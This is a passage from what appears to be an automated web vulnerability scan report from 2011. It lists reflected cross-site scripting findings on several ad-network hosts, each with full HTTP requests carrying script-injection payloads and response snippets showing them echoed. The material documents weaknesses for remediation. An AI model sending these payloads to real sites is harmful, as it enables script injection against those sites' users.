GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction115a8<script>alert(1)</script>512fdd36cd3&n=ar_int_p68511049&1296999647490 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296999600%2E136%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:10 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3edca%3balert(1)//64bba91453a was submitted in the jscallback parameter. This input was echoed as 3edca;alert(1)//64bba91453a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110206132315&adid=401622%2C401622%2C401622&cc=us&di=29166142%2C28321520%2C28321702&hk=1&ipid=12630&mh=167defd4b82c3759d8e6179eb5de4354&pid=2%2C2%2C2&pvm=b60133d74d36fa666d2419a757f62f74&pvu=F09FDD7F3F444C1FA642829D016326B5&rcc=us&so=0&syid=0%2C0%2C0&uf=0%2C0%2C0&ur=0%2C0%2C0&kp=328%2C930%3B336%2C984%3B245%2C1284%3B&prf=ll%3A1385%7Cintl%3A1992%7Cpreprochrome%3A6%7Cgetconchrome%3A27%7Cadvint%3A2035%7Cadvl%3A2035%7Ctl%3A2151&jscallback=$iTXT.js.callback13edca%3balert(1)//64bba91453a HTTP/1.1 Host: baselinemag.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:23:40 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Sun, 06 Feb 2011 13:23:40 GMT
Connection: close
4.21. http://baselinemag.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://baselinemag.us.intellitxt.com
Path: /intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91531'-alert(1)-'750bcc2e0e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=12630&91531'-alert(1)-'750bcc2e0e0=1 HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gQAAAEt99ts1wA-
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJhIgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:30 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJhIgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:30 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 13:21:29 GMT
Content-Length: 10716
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... qoptions={tags:"1480.3017.12630"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://baselinemag.us.intellitxt.com';$iTXT.js.pageQuery='ipid=12630&91531'-alert(1)-'750bcc2e0e0=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 19f15%3balert(1)//734f2337570 was submitted in the jscallback parameter. This input was echoed as 19f15;alert(1)//734f2337570 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1296998594508&pagecl=48119&fv=10&muid=&refurl=http%3A%2F%2Fwww.baselinemag.com%2Fc%2Fa%2FIT-Management%2FMacys-Ramps-Up-Online-Operations-637464%2F&ipid=12630&jscallback=$iTXT.js.callback019f15%3balert(1)//734f2337570 HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 13:22:54 GMT
Connection: close
Content-Length: 12169
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback019f15;alert(1)//734f2337570({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
4.23. http://baselinemag.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://baselinemag.us.intellitxt.com
Path: /v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa9e1"-alert(1)-"d53ef40e92d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1296998594508&pagecl=48119&fv=10&muid=&refurl=http%3A%2F%2Fwww.baselinemag.com%2Fc%2Fa%2FIT-Management%2FMacys-Ramps-Up-Online-Operations-637464%2F&ipid=12630&jscallback=$iTXT.js.callback0&aa9e1"-alert(1)-"d53ef40e92d=1 HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 13:22:55 GMT
Content-Length: 12150
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... 4508","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13","REGIONNAME":"Texas","muid":"","aa9e1"-alert(1)-"d53ef40e92d":"1","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/","rcc":"us","cc":"us"},null,60);var un ...[SNIP]...
The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62043"><script>alert(1)</script>6de2e5bdc2d was submitted in the btid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F862043"><script>alert(1)</script>6de2e5bdc2d&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19116"><script>alert(1)</script>eb6398a7c was submitted in the ei parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK19116"><script>alert(1)</script>eb6398a7c&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The value of the rtbhost request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4721"><script>alert(1)</script>30dfad95144 was submitted in the rtbhost parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.netd4721"><script>alert(1)</script>30dfad95144&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The value of the wp_exchange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8c2"><script>alert(1)</script>adc13858a3b was submitted in the wp_exchange parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw8a8c2"><script>alert(1)</script>adc13858a3b&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37075"><a>62ad8f466de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /kochupusthakam37075"><a>62ad8f466de/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html HTTP/1.1
Host: connect.in.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix)
Pragma: no-cache
nnCoection: close
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 05 Feb 2011 21:51:08 GMT
Date: Sat, 05 Feb 2011 21:51:08 GMT
Content-Length: 27769
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <meta name="description" content="Kochupusthakam37075"><a>62ad8f466de: MALAYALAM KAMBI KATHAKAL, KOCHU PUSTHAKAM. kambi kathakal kochupusthakam kambi kathakal kochupusthakam kambi kathakal kochupusthakam malayalam sex stories. MALAYALAM MASALA STORIES, MASALA VIDEOS. NI ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 76add<a>35d4dfe19df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
